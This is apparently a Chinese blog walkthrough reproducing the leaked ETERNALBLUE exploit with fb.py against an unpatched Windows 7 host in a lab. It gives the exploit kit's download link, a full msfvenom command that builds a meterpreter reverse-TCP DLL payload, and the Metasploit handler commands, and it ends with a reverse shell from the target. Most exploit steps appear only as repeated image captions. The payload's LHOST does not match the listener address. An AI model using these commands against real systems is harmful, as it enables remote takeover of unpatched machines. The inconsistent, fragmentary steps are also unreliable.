方程式ETERNALBLUE 之fb.py的复现

发布时间:2020-07-15 08:26:13 作者:冷暖己知
来源:网络 阅读:2559

方程式ETERNALBLUE 之fb.py的复现

1.环境简介
***机win2003
ip:192.168.1.105
***机kali:
ip:192.168.1.106
靶机(被***机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100

2.windows2003***机
***机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master

安装好python后,需要在win2003设置环境变量:
方程式ETERNALBLUE 之fb.py的复现

将整个ETERNALBLUE 目录下的 windows拷贝到***机win2003上
方程式ETERNALBLUE 之fb.py的复现
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在***机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。

方程式ETERNALBLUE 之fb.py的复现

方程式ETERNALBLUE 之fb.py的复现
方程式ETERNALBLUE 之fb.py的复现
方程式ETERNALBLUE 之fb.py的复现
方程式ETERNALBLUE 之fb.py的复现

方程式ETERNALBLUE 之fb.py的复现
3***机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll
方程式ETERNALBLUE 之fb.py的复现

将s.dll文件拷贝到windows2003的C盘目录下:
方程式ETERNALBLUE 之fb.py的复现

在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
方程式ETERNALBLUE 之fb.py的复现
4.接着在windows2003下执行

方程式ETERNALBLUE 之fb.py的复现

方程式ETERNALBLUE 之fb.py的复现
方程式ETERNALBLUE 之fb.py的复现
方程式ETERNALBLUE 之fb.py的复现

方程式ETERNALBLUE 之fb.py的复现

最后在msf下可以看到成功反弹shell:
方程式ETERNALBLUE 之fb.py的复现

推荐阅读:
  1. fastjson的RCE漏洞复现记录
  2. Nginx 解析漏洞复现

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

kali msf

上一篇:(越秀中心网络运维)telnet远程管理

下一篇:aircrack-ng工具1:airbase-ng

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》